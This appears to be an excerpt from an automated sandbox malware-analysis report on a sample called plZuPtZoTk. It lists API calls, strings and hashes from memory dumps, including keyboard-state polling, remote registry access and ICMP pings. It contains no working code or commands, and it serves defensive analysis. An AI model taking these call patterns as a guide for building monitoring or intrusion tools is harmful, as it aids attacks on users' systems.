                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 1149970189-3457252023
                                                                      • Opcode ID: 801299b061efc85626e02266715758aeb7857fc88588e787913bc980b63ebb91
                                                                      • Instruction ID: 74e2976889ed84807ad573d64b2c618b927f2cfdadeb3fe54b9f3d5141b84329
                                                                      • Opcode Fuzzy Hash: 801299b061efc85626e02266715758aeb7857fc88588e787913bc980b63ebb91
                                                                      • Instruction Fuzzy Hash: A131BE72904309AADB21DBA0DC49FEF77BCFF88751F1040A6F609D6064EB7097858B24
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00A2E6B4
                                                                        • Part of subcall function 009DE551: timeGetTime.WINMM(?,?,00A2E6D4), ref: 009DE555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00A2E6E1
                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00A2E705
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A2E727
                                                                      • SetActiveWindow.USER32 ref: 00A2E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A2E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A2E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00A2E77E
                                                                      • IsWindow.USER32 ref: 00A2E78A
                                                                      • EndDialog.USER32(00000000), ref: 00A2E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 39ebc8070d06976e5a2a15ecc55f00afaddf341ff301d6d59a29e38230073e09
                                                                      • Instruction ID: 4f076fe5244ecd09a2d1d3fd3968b26a2b4bf94ac89bf665e58186ba3741ae6a
                                                                      • Opcode Fuzzy Hash: 39ebc8070d06976e5a2a15ecc55f00afaddf341ff301d6d59a29e38230073e09
                                                                      • Instruction Fuzzy Hash: 36214CB0204315BFEB10DFA8FCC9B263A69F75575AB101436F506826A2DE65AC528B24
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A2EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A2EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A2EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A2EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A2EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 041f0b1a09fea1ddee6f9b768fda9a660eadf2515e30915667d172e2d619c932
                                                                      • Instruction ID: 3b4215a81059596d56d4ac53dde910fe986df5283176b7b930a6881e38c17ec7
                                                                      • Opcode Fuzzy Hash: 041f0b1a09fea1ddee6f9b768fda9a660eadf2515e30915667d172e2d619c932
                                                                      • Instruction Fuzzy Hash: 63115E31A9026979E724F7A5EC4AFFF7A7CFBD1B40F400829B811A20D1EAB00955C6B1
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00A25CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A25D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00A25D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A25DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A25E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00A25E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A25E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00A25E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 004c4679233b27e3a4a53d19ee6bfbaf7e594c9a6750a66681ef693b37cfdcbc
                                                                      • Instruction ID: c9aabfeb73c161ab8e9ea7a989bb66b9353b84870aebc7ee4ccb24dfb21c2a72
                                                                      • Opcode Fuzzy Hash: 004c4679233b27e3a4a53d19ee6bfbaf7e594c9a6750a66681ef693b37cfdcbc
                                                                      • Instruction Fuzzy Hash: 19512C70E00715AFDF18CFA8DD89AAEBBB5FB48311F148129F915E6694D7709E01CB50
                                                                      APIs
                                                                        • Part of subcall function 009D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D8BE8,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8FC5
                                                                      • DestroyWindow.USER32(?), ref: 009D8C81
                                                                      • KillTimer.USER32(00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8D1B
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00A16973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 00A169A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 00A169B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000), ref: 00A169D4
                                                                      • DeleteObject.GDI32(00000000), ref: 00A169E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: cbb2e111858215e0a3a52c9f5c560d1e412eb28a00618c2c0d2e6aa883acdf59
                                                                      • Instruction ID: 11a4c3854aed6cc81884d1542c0ea4547b0946f26ae3924927c624a27ae41c0c
                                                                      • Opcode Fuzzy Hash: cbb2e111858215e0a3a52c9f5c560d1e412eb28a00618c2c0d2e6aa883acdf59
                                                                      • Instruction Fuzzy Hash: BA618E30552701DFCB25DF64D988B6A77F5FB50322F14891AE0829BAA1CB35A9C2DF90
                                                                      APIs
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      • GetSysColor.USER32(0000000F), ref: 009D9862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 88ad99ab739fdf913394b673798b2053b924e0c420240c7ef3e6e4b5df388f68
                                                                      • Instruction ID: 414ee3ba8683eaf4075efd3905939e5ea576bb07ecb7bed2bd4f6bd1220dcc0c
                                                                      • Opcode Fuzzy Hash: 88ad99ab739fdf913394b673798b2053b924e0c420240c7ef3e6e4b5df388f68
                                                                      • Instruction Fuzzy Hash: F641A6311447449FDF20AF789C84BB9376AFB06731F148616F9A2872E5D7319D42EB10
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00A29717
                                                                      • LoadStringW.USER32(00000000,?,00A0F7F8,00000001), ref: 00A29720
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00A29742
                                                                      • LoadStringW.USER32(00000000,?,00A0F7F8,00000001), ref: 00A29745
                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00A29866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 473759a20e00524dddf5da0fa630adb09e55ed108c91c55a3506e3425455384a
                                                                      • Instruction ID: b0461f4438b3025dd9e9c20842c00e95f15107d0cb39db11d55cc39522cd33df
                                                                      • Opcode Fuzzy Hash: 473759a20e00524dddf5da0fa630adb09e55ed108c91c55a3506e3425455384a
                                                                      • Instruction Fuzzy Hash: B7415D72D00219AADB04FBE0DE46FEE7378AF94740F504129B60672092EB356F49CB62
                                                                      APIs
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A207A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A207BE
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A207DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A20804
                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A2082C
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A20837
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A2083C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: 43dc75fe00457624c6f4ce2b08de82bda1cf51ac848ec7fc4e78908f229f917c
                                                                      • Instruction ID: dfd0e0dd56b1d0d8de0a5d90208b8baa500768f2d66b7799124b17b6eda8ff6b
                                                                      • Opcode Fuzzy Hash: 43dc75fe00457624c6f4ce2b08de82bda1cf51ac848ec7fc4e78908f229f917c
                                                                      • Instruction Fuzzy Hash: B341F472D10629AFDF15EBA4EC95EEEB778FF44354B444129E901A31A1EB309E04CBA1
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00A43C5C
                                                                      • CoInitialize.OLE32(00000000), ref: 00A43C8A
                                                                      • CoUninitialize.OLE32 ref: 00A43C94
                                                                      • _wcslen.LIBCMT ref: 00A43D2D
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00A43DB1
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A43ED5
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A43F0E
                                                                      • CoGetObject.OLE32(?,00000000,00A5FB98,?), ref: 00A43F2D
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00A43F40
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A43FC4
                                                                      • VariantClear.OLEAUT32(?), ref: 00A43FD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                      • String ID:
                                                                      • API String ID: 429561992-0
                                                                      • Opcode ID: d965c168becba83c277ed4cad40c321fcd0930628d1729ba0c00e8e918997711
                                                                      • Instruction ID: 30c070249bf29bffece4f11be6afedb374f86b3653eb8945fb3120951be108f9
                                                                      • Opcode Fuzzy Hash: d965c168becba83c277ed4cad40c321fcd0930628d1729ba0c00e8e918997711
                                                                      • Instruction Fuzzy Hash: 0EC11376A08301AFDB00DF68C88592AB7E9FFC9754F10491DF98A9B251D731EE06CB52
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00A37AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A37B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00A37BA3
                                                                      • CoCreateInstance.OLE32(00A5FD08,00000000,00000001,00A86E6C,?), ref: 00A37BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A37C74
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00A37CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00A37D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A37D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00A37D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00A37DD6
                                                                      • CoUninitialize.OLE32 ref: 00A37DDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: c14d35152e8551e48e218c43fd6c9144ea5f3fab415c1cace866acc068af75db
                                                                      • Instruction ID: 98824941810586c924e2a9ce8445499bbb63c15d050663c5a83e9081f9dd8de9
                                                                      • Opcode Fuzzy Hash: c14d35152e8551e48e218c43fd6c9144ea5f3fab415c1cace866acc068af75db
                                                                      • Instruction Fuzzy Hash: 9EC1EB75A04219AFCB14DFA4C884EAEBBF5FF48314F148499F41A9B261D731ED45CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A55504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A55515
                                                                      • CharNextW.USER32(00000158), ref: 00A55544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A55585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A5559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A555AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: 789ddc91323418d73ead6dba1a70c683c66145d635c8f19dcc32abceba21f3aa
                                                                      • Instruction ID: c6bc1ed734ffbdf1c8d5ba637f91185e742cbdddaa94d945da16738d047c0381
                                                                      • Opcode Fuzzy Hash: 789ddc91323418d73ead6dba1a70c683c66145d635c8f19dcc32abceba21f3aa
                                                                      • Instruction Fuzzy Hash: E3617D70D00609EFDF10CFA4CC94AFE7BB9FB09722F108145F925A6290D7788A89DB60
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A1FAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00A1FB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00A1FB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A1FB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00A1FB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A1FBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00A1FBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00A1FBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A1FBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00A1FBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A1FBE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: fcbc157223d4084587d88b8995cff1d5819dc793b478ba9f6dab4cb386b9f337
                                                                      • Instruction ID: 914d0fbbea5656e06fc48439017a673691142ead33b386c89e432589a1005139
                                                                      • Opcode Fuzzy Hash: fcbc157223d4084587d88b8995cff1d5819dc793b478ba9f6dab4cb386b9f337
                                                                      • Instruction Fuzzy Hash: 6B414275A04319AFCB00DFA8C858DEDBBB9FF48355F008069E956A7265C734AA46CF90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00A29CA1
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00A29D22
                                                                      • GetKeyState.USER32(000000A0), ref: 00A29D3D
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00A29D57
                                                                      • GetKeyState.USER32(000000A1), ref: 00A29D6C
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00A29D84
                                                                      • GetKeyState.USER32(00000011), ref: 00A29D96
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00A29DAE
                                                                      • GetKeyState.USER32(00000012), ref: 00A29DC0
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00A29DD8
                                                                      • GetKeyState.USER32(0000005B), ref: 00A29DEA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: c496ecba508c7017389c3819cc714f2d6f410409a6f08a3fdc3030f36958ed75
                                                                      • Instruction ID: ad03f5a077e4beb9c49121786f25d4ccf60c744fcbebcebf000ef82ccd70f61d
                                                                      • Opcode Fuzzy Hash: c496ecba508c7017389c3819cc714f2d6f410409a6f08a3fdc3030f36958ed75
                                                                      • Instruction Fuzzy Hash: C241E7345047D96DFF3487A8E8043B7BEE07F11B44F04807ADAC6565C2EBA499C8D7A2
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00A405BC
                                                                      • inet_addr.WSOCK32(?), ref: 00A4061C
                                                                      • gethostbyname.WSOCK32(?), ref: 00A40628
                                                                      • IcmpCreateFile.IPHLPAPI ref: 00A40636
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406C6
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406E5
                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00A407B9
                                                                      • WSACleanup.WSOCK32 ref: 00A407BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: 15142036fd993970d1391d1ce584df158504fbabe5f64413600859aeee15bff5
                                                                      • Instruction ID: 78afe8c3c60fb574c4a0473795ad5f09b754f55eba3734da6f2aa91d388f88ec
                                                                      • Opcode Fuzzy Hash: 15142036fd993970d1391d1ce584df158504fbabe5f64413600859aeee15bff5
                                                                      • Instruction Fuzzy Hash: 03917C396047019FD320DF15C489F1ABBE0BF88318F1585A9F56A8B6A2C770ED41DF92
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharLower
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 707087890-567219261
                                                                      • Opcode ID: 5ac38d9dedf2c9eb13315bd5ce535341b2e624579ccaf1ec6addb2cc3f27d6a9
                                                                      • Instruction ID: a307dddd8a6383ddbdd0aa96a57734bb34d575b78b83ca14a5af6b91cb6e6c5e
                                                                      • Opcode Fuzzy Hash: 5ac38d9dedf2c9eb13315bd5ce535341b2e624579ccaf1ec6addb2cc3f27d6a9
                                                                      • Instruction Fuzzy Hash: 0C519035E011169BCF14EF6CD9419BEB7B5BFA4724B204229E826E72C5EB39DD40C790
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 00A43774
                                                                      • CoUninitialize.OLE32 ref: 00A4377F
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00A5FB78,?), ref: 00A437D9
                                                                      • IIDFromString.OLE32(?,?), ref: 00A4384C
                                                                      • VariantInit.OLEAUT32(?), ref: 00A438E4
                                                                      • VariantClear.OLEAUT32(?), ref: 00A43936
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: 3a05b55f34f6b6fa380294d0487b561e92a88c65491334753eb2e058da46daee
                                                                      • Instruction ID: b6c7060e837f9dba3a5396fd84ffe82f19b03541a48a8c2f77789e330b4d6146
